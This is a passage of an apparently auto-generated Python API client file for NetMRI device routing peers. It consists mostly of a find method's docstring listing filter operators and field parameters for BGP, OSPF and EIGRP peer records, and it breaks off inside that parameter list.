| ``required:`` False
| ``default:`` None
:return device_routing_proto_peers: An array of the DeviceRoutingProtoPeer objects that match the specified input criteria.
:rtype device_routing_proto_peers: Array of DeviceRoutingProtoPeer
"""
return self.api_list_request(self._get_method_fullname("search"), kwargs)
def find(self, **kwargs):
"""Lists the available device routing proto peers matching the input specification. This provides the most flexible search specification of all the query mechanisms, enabling searching using comparison operations other than equality. However, it is more complex to use and will not perform as efficiently as the index or search methods. In the input descriptions below, 'field names' refers to the following fields: BGPLocalIPDotted, BGPLocalIPNumeric, BGPLocalPort, BGPPeerPort, DataSourceID, DeviceID, DeviceRPPeerID, EigrpRetransCount, EigrpRetriesCount, IfAddrID, InterfaceID, OspfPeerAddresslessIndex, OspfPeerEventsDelta, OspfPeerPermanence, OspfPeerRouterIdentDotted, OspfPeerRouterIdentNumeric, PeerDeviceID, PeerInterfaceID, RPPeerChangedCols, RPPeerEndTime, RPPeerIPDotted, RPPeerIPNumeric, RPPeerMapSource, RPPeerStartTime, RPPeerState, RPPeerTimestamp, RPPeerType, RPPeerUpSince, RouteProto, RoutingAreaID.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_BGPLocalIPDotted: The operator to apply to the field BGPLocalIPDotted. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BGPLocalIPDotted: The numerical local IP address for this peer relationship's BGP connection. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_BGPLocalIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BGPLocalIPDotted: If op_BGPLocalIPDotted is specified, the field named in this input will be compared to the value in BGPLocalIPDotted using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BGPLocalIPDotted must be specified if op_BGPLocalIPDotted is specified.
:type val_f_BGPLocalIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BGPLocalIPDotted: If op_BGPLocalIPDotted is specified, this value will be compared to the value in BGPLocalIPDotted using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BGPLocalIPDotted must be specified if op_BGPLocalIPDotted is specified.
:type val_c_BGPLocalIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_BGPLocalIPNumeric: The operator to apply to the field BGPLocalIPNumeric. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BGPLocalIPNumeric: The local IP address for this peer relationship's BGP connection, in dotted (or colon-delimited for IPv6) notation. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_BGPLocalIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BGPLocalIPNumeric: If op_BGPLocalIPNumeric is specified, the field named in this input will be compared to the value in BGPLocalIPNumeric using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BGPLocalIPNumeric must be specified if op_BGPLocalIPNumeric is specified.
:type val_f_BGPLocalIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BGPLocalIPNumeric: If op_BGPLocalIPNumeric is specified, this value will be compared to the value in BGPLocalIPNumeric using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BGPLocalIPNumeric must be specified if op_BGPLocalIPNumeric is specified.
:type val_c_BGPLocalIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_BGPLocalPort: The operator to apply to the field BGPLocalPort. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BGPLocalPort: The local TCP port number for this entry's BGP connection. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_BGPLocalPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BGPLocalPort: If op_BGPLocalPort is specified, the field named in this input will be compared to the value in BGPLocalPort using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BGPLocalPort must be specified if op_BGPLocalPort is specified.
:type val_f_BGPLocalPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BGPLocalPort: If op_BGPLocalPort is specified, this value will be compared to the value in BGPLocalPort using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BGPLocalPort must be specified if op_BGPLocalPort is specified.
:type val_c_BGPLocalPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_BGPPeerPort: The operator to apply to the field BGPPeerPort. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. BGPPeerPort: The remote TCP port number for this entry's BGP connection. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_BGPPeerPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_BGPPeerPort: If op_BGPPeerPort is specified, the field named in this input will be compared to the value in BGPPeerPort using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_BGPPeerPort must be specified if op_BGPPeerPort is specified.
:type val_f_BGPPeerPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_BGPPeerPort: If op_BGPPeerPort is specified, this value will be compared to the value in BGPPeerPort using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_BGPPeerPort must be specified if op_BGPPeerPort is specified.
:type val_c_BGPPeerPort: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceID: The operator to apply to the field DeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceID: The internal NetMRI identifier for the device from which this routing peer data was collected. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceID: If op_DeviceID is specified, the field named in this input will be compared to the value in DeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceID must be specified if op_DeviceID is specified.
:type val_f_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceID: If op_DeviceID is specified, this value will be compared to the value in DeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceID must be specified if op_DeviceID is specified.
:type val_c_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceRPPeerID: The operator to apply to the field DeviceRPPeerID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceRPPeerID: The internal NetMRI identifier of this routing peer relationship. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceRPPeerID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceRPPeerID: If op_DeviceRPPeerID is specified, the field named in this input will be compared to the value in DeviceRPPeerID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceRPPeerID must be specified if op_DeviceRPPeerID is specified.
:type val_f_DeviceRPPeerID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceRPPeerID: If op_DeviceRPPeerID is specified, this value will be compared to the value in DeviceRPPeerID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceRPPeerID must be specified if op_DeviceRPPeerID is specified.
:type val_c_DeviceRPPeerID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_EigrpRetransCount: The operator to apply to the field EigrpRetransCount. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. EigrpRetransCount: The cumulative number of retransmissions to this peer during the period that the peer adjacency has remained up. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_EigrpRetransCount: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_EigrpRetransCount: If op_EigrpRetransCount is specified, the field named in this input will be compared to the value in EigrpRetransCount using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_EigrpRetransCount must be specified if op_EigrpRetransCount is specified.
:type val_f_EigrpRetransCount: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_EigrpRetransCount: If op_EigrpRetransCount is specified, this value will be compared to the value in EigrpRetransCount using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_EigrpRetransCount must be specified if op_EigrpRetransCount is specified.
:type val_c_EigrpRetransCount: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_EigrpRetriesCount: The operator to apply to the field EigrpRetriesCount. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. EigrpRetriesCount: The number of times the current unacknowledged packet has been retried, i.e. resent to this peer to be acknowledged. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_EigrpRetriesCount: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_EigrpRetriesCount: If op_EigrpRetriesCount is specified, the field named in this input will be compared to the value in EigrpRetriesCount using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_EigrpRetriesCount must be specified if op_EigrpRetriesCount is specified.
:type val_f_EigrpRetriesCount: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_EigrpRetriesCount: If op_EigrpRetriesCount is specified, this value will be compared to the value in EigrpRetriesCount using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_EigrpRetriesCount must be specified if op_EigrpRetriesCount is specified.
:type val_c_EigrpRetriesCount: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IfAddrID: The operator to apply to the field IfAddrID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IfAddrID: The internal NetMRI identifier for the local IP address used in this peer relationship, if available. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IfAddrID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IfAddrID: If op_IfAddrID is specified, the field named in this input will be compared to the value in IfAddrID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IfAddrID must be specified if op_IfAddrID is specified.
:type val_f_IfAddrID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IfAddrID: If op_IfAddrID is specified, this value will be compared to the value in IfAddrID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IfAddrID must be specified if op_IfAddrID is specified.
:type val_c_IfAddrID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_InterfaceID: The operator to apply to the field InterfaceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. InterfaceID: The internal NetMRI identifier for the interface over which this peer relationship exists, if available. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_InterfaceID: If op_InterfaceID is specified, the field named in this input will be compared to the value in InterfaceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_InterfaceID must be specified if op_InterfaceID is specified.
:type val_f_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_InterfaceID: If op_InterfaceID is specified, this value will be compared to the value in InterfaceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_InterfaceID must be specified if op_InterfaceID is specified.
:type val_c_InterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_OspfPeerAddresslessIndex: The operator to apply to the field OspfPeerAddresslessIndex. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. OspfPeerAddresslessIndex: For addressless peer interfaces, this will contain the SNMP interface index for the peer's interface. The peer IP address will contain the IP of another interface on the peer. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_OspfPeerAddresslessIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_OspfPeerAddresslessIndex: If op_OspfPeerAddresslessIndex is specified, the field named in this input will be compared to the value in OspfPeerAddresslessIndex using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_OspfPeerAddresslessIndex must be specified if op_OspfPeerAddresslessIndex is specified.
:type val_f_OspfPeerAddresslessIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_OspfPeerAddresslessIndex: If op_OspfPeerAddresslessIndex is specified, this value will be compared to the value in OspfPeerAddresslessIndex using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_OspfPeerAddresslessIndex must be specified if op_OspfPeerAddresslessIndex is specified.
:type val_c_OspfPeerAddresslessIndex: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_OspfPeerEventsDelta: The operator to apply to the field OspfPeerEventsDelta. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. OspfPeerEventsDelta: The number of times that this neighbor relationship has changed state, since the last time NetMRI polled the device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_OspfPeerEventsDelta: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_OspfPeerEventsDelta: If op_OspfPeerEventsDelta is specified, the field named in this input will be compared to the value in OspfPeerEventsDelta using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_OspfPeerEventsDelta must be specified if op_OspfPeerEventsDelta is specified.
:type val_f_OspfPeerEventsDelta: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_OspfPeerEventsDelta: If op_OspfPeerEventsDelta is specified, this value will be compared to the value in OspfPeerEventsDelta using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_OspfPeerEventsDelta must be specified if op_OspfPeerEventsDelta is specified.
:type val_c_OspfPeerEventsDelta: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_OspfPeerPermanence: The operator to apply to the field OspfPeerPermanence. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. OspfPeerPermanence: How this neighbor was determined, 'dynamic' for learned through the protocol, 'permanent' for configured. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_OspfPeerPermanence: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_OspfPeerPermanence: If op_OspfPeerPermanence is specified, the field named in this input will be compared to the value in OspfPeerPermanence using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_OspfPeerPermanence must be specified if op_OspfPeerPermanence is specified.
:type val_f_OspfPeerPermanence: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_OspfPeerPermanence: If op_OspfPeerPermanence is specified, this value will be compared to the value in OspfPeerPermanence using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_OspfPeerPermanence must be specified if op_OspfPeerPermanence is specified.
:type val_c_OspfPeerPermanence: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_OspfPeerRouterIdentDotted: The operator to apply to the field OspfPeerRouterIdentDotted. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. OspfPeerRouterIdentDotted: The OSPF router identifier of the peer, in dotted (or colon-delimited for IPv6) format, if relevant. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_OspfPeerRouterIdentDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_OspfPeerRouterIdentDotted: If op_OspfPeerRouterIdentDotted is specified, the field named in this input will be compared to the value in OspfPeerRouterIdentDotted using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_OspfPeerRouterIdentDotted must be specified if op_OspfPeerRouterIdentDotted is specified.
:type val_f_OspfPeerRouterIdentDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_OspfPeerRouterIdentDotted: If op_OspfPeerRouterIdentDotted is specified, this value will be compared to the value in OspfPeerRouterIdentDotted using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_OspfPeerRouterIdentDotted must be specified if op_OspfPeerRouterIdentDotted is specified.
:type val_c_OspfPeerRouterIdentDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_OspfPeerRouterIdentNumeric: The operator to apply to the field OspfPeerRouterIdentNumeric. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. OspfPeerRouterIdentNumeric: The numerical OSPF router identifier of the peer. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_OspfPeerRouterIdentNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_OspfPeerRouterIdentNumeric: If op_OspfPeerRouterIdentNumeric is specified, the field named in this input will be compared to the value in OspfPeerRouterIdentNumeric using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_OspfPeerRouterIdentNumeric must be specified if op_OspfPeerRouterIdentNumeric is specified.
:type val_f_OspfPeerRouterIdentNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_OspfPeerRouterIdentNumeric: If op_OspfPeerRouterIdentNumeric is specified, this value will be compared to the value in OspfPeerRouterIdentNumeric using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_OspfPeerRouterIdentNumeric must be specified if op_OspfPeerRouterIdentNumeric is specified.
:type val_c_OspfPeerRouterIdentNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PeerDeviceID: The operator to apply to the field PeerDeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PeerDeviceID: The internal NetMRI identifier for the peer device. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PeerDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PeerDeviceID: If op_PeerDeviceID is specified, the field named in this input will be compared to the value in PeerDeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PeerDeviceID must be specified if op_PeerDeviceID is specified.
:type val_f_PeerDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PeerDeviceID: If op_PeerDeviceID is specified, this value will be compared to the value in PeerDeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PeerDeviceID must be specified if op_PeerDeviceID is specified.
:type val_c_PeerDeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_PeerInterfaceID: The operator to apply to the field PeerInterfaceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. PeerInterfaceID: The internal NetMRI identifier for the remote router's interface over which this peer relationship exists, if available. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_PeerInterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_PeerInterfaceID: If op_PeerInterfaceID is specified, the field named in this input will be compared to the value in PeerInterfaceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_PeerInterfaceID must be specified if op_PeerInterfaceID is specified.
:type val_f_PeerInterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_PeerInterfaceID: If op_PeerInterfaceID is specified, this value will be compared to the value in PeerInterfaceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_PeerInterfaceID must be specified if op_PeerInterfaceID is specified.
:type val_c_PeerInterfaceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RPPeerChangedCols: The operator to apply to the field RPPeerChangedCols. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RPPeerChangedCols: The fields that changed between this revision of the record and the previous revision. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_RPPeerChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RPPeerChangedCols: If op_RPPeerChangedCols is specified, the field named in this input will be compared to the value in RPPeerChangedCols using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RPPeerChangedCols must be specified if op_RPPeerChangedCols is specified.
:type val_f_RPPeerChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RPPeerChangedCols: If op_RPPeerChangedCols is specified, this value will be compared to the value in RPPeerChangedCols using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RPPeerChangedCols must be specified if op_RPPeerChangedCols is specified.
:type val_c_RPPeerChangedCols: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RPPeerEndTime: The operator to apply to the field RPPeerEndTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RPPeerEndTime: The ending effective time of this revision of this record, or empty if still in effect. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_RPPeerEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RPPeerEndTime: If op_RPPeerEndTime is specified, the field named in this input will be compared to the value in RPPeerEndTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RPPeerEndTime must be specified if op_RPPeerEndTime is specified.
:type val_f_RPPeerEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RPPeerEndTime: If op_RPPeerEndTime is specified, this value will be compared to the value in RPPeerEndTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RPPeerEndTime must be specified if op_RPPeerEndTime is specified.
:type val_c_RPPeerEndTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RPPeerIPDotted: The operator to apply to the field RPPeerIPDotted. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RPPeerIPDotted: The IP address of the peer, in dotted (or colon-delimited for IPv6) format. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_RPPeerIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RPPeerIPDotted: If op_RPPeerIPDotted is specified, the field named in this input will be compared to the value in RPPeerIPDotted using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RPPeerIPDotted must be specified if op_RPPeerIPDotted is specified.
:type val_f_RPPeerIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RPPeerIPDotted: If op_RPPeerIPDotted is specified, this value will be compared to the value in RPPeerIPDotted using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RPPeerIPDotted must be specified if op_RPPeerIPDotted is specified.
:type val_c_RPPeerIPDotted: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RPPeerIPNumeric: The operator to apply to the field RPPeerIPNumeric. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RPPeerIPNumeric: The numerical IP address of the peer. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_RPPeerIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RPPeerIPNumeric: If op_RPPeerIPNumeric is specified, the field named in this input will be compared to the value in RPPeerIPNumeric using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RPPeerIPNumeric must be specified if op_RPPeerIPNumeric is specified.
:type val_f_RPPeerIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RPPeerIPNumeric: If op_RPPeerIPNumeric is specified, this value will be compared to the value in RPPeerIPNumeric using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RPPeerIPNumeric must be specified if op_RPPeerIPNumeric is specified.
:type val_c_RPPeerIPNumeric: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RPPeerMapSource: The operator to apply to the field RPPeerMapSource. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RPPeerMapSource: Internal tracking data for NetMRI algorithms. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_RPPeerMapSource: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RPPeerMapSource: If op_RPPeerMapSource is specified, the field named in this input will be compared to the value in RPPeerMapSource using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RPPeerMapSource must be specified if op_RPPeerMapSource is specified.
:type val_f_RPPeerMapSource: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RPPeerMapSource: If op_RPPeerMapSource is specified, this value will be compared to the value in RPPeerMapSource using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RPPeerMapSource must be specified if op_RPPeerMapSource is specified.
:type val_c_RPPeerMapSource: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RPPeerStartTime: The operator to apply to the field RPPeerStartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RPPeerStartTime: The starting effective time of this revision of the record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_RPPeerStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RPPeerStartTime: If op_RPPeerStartTime is specified, the field named in this input will be compared to the value in RPPeerStartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RPPeerStartTime must be specified if op_RPPeerStartTime is specified.
:type val_f_RPPeerStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RPPeerStartTime: If op_RPPeerStartTime is specified, this value will be compared to the value in RPPeerStartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RPPeerStartTime must be specified if op_RPPeerStartTime is specified.
:type val_c_RPPeerStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_RPPeerState: The operator to apply to the field RPPeerState. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. RPPeerState: The protocol-specific state of this routing peer relationship. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_RPPeerState: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_RPPeerState: If op_RPPeerState is specified, the field named in this input will be compared to the value in RPPeerState using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_RPPeerState must be specified if op_RPPeerState is specified.
:type val_f_RPPeerState: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_RPPeerState: If op_RPPeerState is specified, this value will be compared to the value in RPPeerState using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_RPPeerState must be specified if op_RPPeerState is specified.
:type val_c_RPPeerState: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
